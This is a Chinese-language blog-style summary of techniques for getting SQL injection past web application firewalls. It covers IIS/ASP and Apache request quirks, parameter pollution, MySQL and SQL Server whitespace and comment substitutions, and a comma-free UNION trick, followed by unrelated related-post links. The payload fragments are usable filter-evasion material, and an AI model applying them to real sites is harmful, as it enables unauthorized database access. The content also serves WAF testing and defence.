SQL注入绕过技巧总结
1、SQL注入过程中的处理#
终端payload编码------>web服务器解码-------->CGI脚本解码------>web应用解码----->数据库解码
浏览器、代理等
ISS/Apache/Tomcat
php/java/asp.net
xxx系统
mysql/sqlserver
硬件waf
软件waf
2、bypass方法#
2.1 服务器层面bypass#
2.1.1 IIS+ASP、URL处理#
%符号的处理:会自动去掉特殊符号%,例如输入se%lect,解析出select。
unicode处理:%u,会自动解码,例如s%u006c%u0006ect
2.1.2 Apache#
有的版本允许畸形请求存在,例如GET可替换为任意word,例如"DOTA"
2.1.3 HPP方式#
id=1&id=2&id=3
Asp.net + iis: id=1,2,3
php + apache: id = 3
2.2 数据库层面bypass#
1 union select a,b from where and 1 2 3 4 5 6 7 8 9
2.2.1 mysql数据库#
位置1的替换
1、(\N) ---> id=\Nunion select
2、浮点数直接连接 --------> id=1.1union select
3、(nen) n为整数 ---------> 1e2union select
4、单/双引号(如需要单/双引号闭合,则无需空格)
5、左括号: ----------> union (select xx)
6、注释:任意/**/注释 ------------------> 1/*here*/union select xx
7、特殊注释:其中的数字和版本有关,一般大于10000都行。 -----> id=1/*!50000union*/select
位置2的替换#
位置3的替换#
1、空格替换:有如下字符可替代空格
%09, %0a, %0b, %0c, %0d, %a0
2、注释:任意/**/注释,例如 ----> union/*here*/select xx
3、左括号: ------> 1 union (select xx)
位置4的替换#
位置5的替换#
1、空格替换:有如下字符可替代空格
%09, %0a, %0b, %0c, %0d, %a0
2、左括号: ------> 1 union select (1), xx
3、运算符
加减号: 1 union select+1,xx1 union select-1,xx
~符号: 1 union select~1, xx
!符号: 1 union select!1,xx
@``@^符号:(at后面是反引号): 1 union select@`1`, xx1 union select@^1, xx
注释:任意/**/注释: 1/*here*/union select xx
特殊注释: 1 union/*!50000select*/1, xx
反引号: 1 union select `user`, xx
单/双引号: 1 union select"1", xx
{}大括号: 1 union select{x 1}, xx
\N符号: 1 union select\N, xx
位置6替换#(同位置5替换)
位置7替换#(参考位置5,无算数运算符)
其他#
1、字符串截取函数
Mid(version(), 1,1)
Substr(version(),1,1)
Substring(version(),1,1)
Lpad(version(),1)
Rpad(version(),1,1)
Left(version(),1)
reverse(right(reverse(version()),1)
2、字符串连接函数
concat(version(), '|', user());
concat_ws('|',1,2,3)
3、字符转换
Ascii(1)
Char(49)
Hex('a')
Unhex(61)
4、/*!50000keyword*/替换
任何关键字都可以用/*!50000keyword*/替换
sqlserver数据库
空格替换#
空格符可使用以下符号替换:
01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
位置5/6的替换#
1、:号
1 union select:top 1 from
位置7的替换:#
1、.号
1 union select xx from.table
2、:号
1 union select xx from:table
and后的替换:#
1、:号
1 and:xx
2、%2b号
1 and%2bxx
其他#
1、字符串截取函数
Substring(@@version,1,1)Left(@@version,1)Right(@@version,1)
2、字符串转换函数
Ascii(‘a’) 这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypassChar(‘97’)
当存在sql注入的情况,但是过滤了“,”,利用UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b实际上也就相当于UNION SELECT 1,2
SQL注入绕过技巧总结的更多相关文章
- SQL注入绕过技巧
1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: % % %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注 ...
- SQL Injection绕过技巧
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量. 但是更深层次的原因是,将用户输入的字符串,当成了 "sql语 ...
- SQL注入绕过的技巧总结
sql注入在很早很早以前是很常见的一个漏洞.后来随着安全水平的提高,sql注入已经很少能够看到了.但是就在今天,还有很多网站带着sql注入漏洞在运行.稍微有点安全意识的朋友就应该懂得要做一下sql注入 ...
- 深入理解SQL注入绕过WAF和过滤机制
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...
- 深入了解SQL注入绕过waf和过滤机制
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...
- 深入理解SQL注入绕过WAF与过滤机制
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...
- TSRC挑战赛:WAF之SQL注入绕过挑战实录
转自腾讯 博文作者:TSRC白帽子 发布日期:2014-09-03 阅读次数:1338 博文内容: 博文作者:lol [TSRC 白帽子] 第二作者:Conqu3r.花开若相惜 来自团队:[Pax.M ...
- 五十:代码审计-PHP无框架项目SQL注入挖掘技巧
代码审计教学计划: 审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞 代码审计教学内容: PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用 代码 ...
- SQL注入绕过waf的一万种姿势
绕过waf分类: 白盒绕过: 针对代码审计,有的waf采用代码的方式,编写过滤函数,如下blacklist()函数所示: 1 ........ 2 3 $id=$_GET['id']; 4 5 $ ...
随机推荐
- requests模块
import requests url='https://www.cnblogs.com/Eva-J/p/7277026.html' get = requests.get(url) print(get ...
- TCP/IP及内核参数优化调优
Linux下TCP/IP及内核参数优化有多种方式,参数配置得当可以大大提高系统的性能,也可以根据特定场景进行专门的优化,如TIME_WAIT过高,DDOS攻击等等.如下配置是写在sysctl.conf ...
- python之shell
import subprocess # 返回命令执行结果 # result = subprocess.call('ls -l', shell=True) # result = subprocess.c ...
- AI adanet
adanet是一个基于Tensorflow的轻量级框架,只需要很少的专业干预,就可以自动学习出高质量的模型.在最近的AutoML成果上构建,既快速又灵活,还可以保证学习质量. adanet提供通用框架 ...
- 学号 20175329 2018-2019-3《Java程序设计》第九周学习总结
学号 20175329 2018-2019-3<Java程序设计>第八周学习总结 教材学习内容总结 第十五章 泛型 可以使用"class 名称"声明一个类,为了和普通的 ...
- Git和Gitlab在使用过程中所遇到的问题
01-关于gitLab添加ssh key后,git clone还提示输入密码问题 本地用户连接远程仓库需要用 HTTP方式连接,SSH方式会出现提示输入密码 git clone http://.... ...
- Ubuntu软件的安装与删除
- php中header函数参数的Cache-control的使用方法
网页的缓存是由HTTP消息头中的“Cache-control”来控制的,常见的取值有private.no-cache.max-age.must-revalidate等,默认为private.其作用根据 ...
- 23个Python爬虫开源项目代码,让你一次学个够
今天为大家整理了23个Python爬虫项目.整理的原因是,爬虫入门简单快速,也非常适合新入门的小伙伴培养信心.所有链接指向GitHub,祝大家玩的愉快 1.WechatSogou [1]– 微信公众号 ...
- Python——电子邮件、Internet协议相关模块
一.电子邮件相关模块 email:用于处理电子邮件 smtpd:SMTP服务器 base64:Base-16.32.64数据编码 mhlib:处理MH文件格式解析的类 mailcap:mailcap文 ...